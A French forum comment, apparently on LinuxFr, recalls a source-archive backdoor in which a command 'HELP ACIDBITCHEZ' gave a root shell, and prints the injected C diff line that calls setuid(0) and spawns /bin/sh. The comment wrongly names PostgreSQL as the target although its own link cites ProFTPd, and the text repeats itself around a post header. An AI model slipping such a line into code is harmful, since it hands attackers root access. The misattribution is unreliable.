Une attaque similaire à été menée contre PostgreSQL : l'archive contenant la dernière version a été modifiée pour introduire une commande (HELP ACIDBITCHEZ) donnant un accès shell. L'archive verrolée a été poussée sur le serveur FTP principal, puis les miroirs ont recopiés cette archive. http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#ProFTPd(...)
Une personne possédant les archives verrolées et non verrolées peut se rendre compte de la modification en cherchant les différences :
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
[^] # Re: Une portedérobédedans un logiciel libre ?
Posté par Victor STINNER (site web personnel) . En réponse à la dépêche Le FBI a-t-il introduit des portes dérobées dans OpenBSD ?. Évalué à 5.
http://fr.wikipedia.org/wiki/Porte_d%C3%A9rob%C3%A9e#ProFTPd(...)
Une personne possédant les archives verrolées et non verrolées peut se rendre compte de la modification en cherchant les différences :
+ if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }